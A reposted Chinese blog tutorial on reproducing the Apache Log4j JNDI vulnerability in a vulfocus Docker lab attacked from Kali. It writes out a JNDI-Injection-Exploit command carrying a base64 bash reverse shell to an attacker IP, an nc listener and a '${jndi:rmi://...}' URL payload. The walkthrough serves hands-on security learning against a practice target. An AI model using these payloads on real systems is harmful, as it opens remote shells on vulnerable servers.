我是靠谱客的博主 辛勤铃铛,最近开发中收集的这篇文章主要介绍apache log4j vulfocus 复现环境配置cenos7 搭建docker 拉去vulfocus靶场 kali ,觉得挺不错的,现在分享给大家,希望可以做个参考。
概述
环境配置
cenos7 搭建docker 拉去vulfocus靶场
kali
如果这不长时间卡顿 就是网络的问题 可以尝试终止命令重新下载。同学5g网真的块
docker pull vulfocus/vulfocus:latest
拉取docker环境
docker run -d -p 801:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.137.11 vulfocus/vulfocus在网页中打开环境 ⬆ ⬆ ⬆ 看到了吗就上面801:80 选择前面那个801 物理机映射地址
kali内的payload生成语句
如果显示没有java环境
https://codeload.github.com/fangjiuye/jiuye/zip/refs/heads/main 下载它放在kali主目录
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,放base64解码后的代码}|{base64,-d}|{bash,-i}" -A 192.168.137.131 这里也是攻击地址bash -i >& /dev/tcp/192.168.198.131/7777 0>&1 #里面的ip是攻击机的ip地址
在打开一个kali 终端 使用nc -lvvp 端口号 进行监听这个7777端口返回来的数据
payload=$%7bjndi:rmi://192.168.198.131:1099/tklp4z%7d 更换成你生成的语句 放在url中的payload后面进行调用
回显 如果不回显并且把 kali生成的jdk都用过后 那就放松一下 回忆一下然后开始骂人吧
最后
以上就是辛勤铃铛为你收集整理的apache log4j vulfocus 复现环境配置cenos7 搭建docker 拉去vulfocus靶场 kali 的全部内容,希望文章能够帮你解决apache log4j vulfocus 复现环境配置cenos7 搭建docker 拉去vulfocus靶场 kali 所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复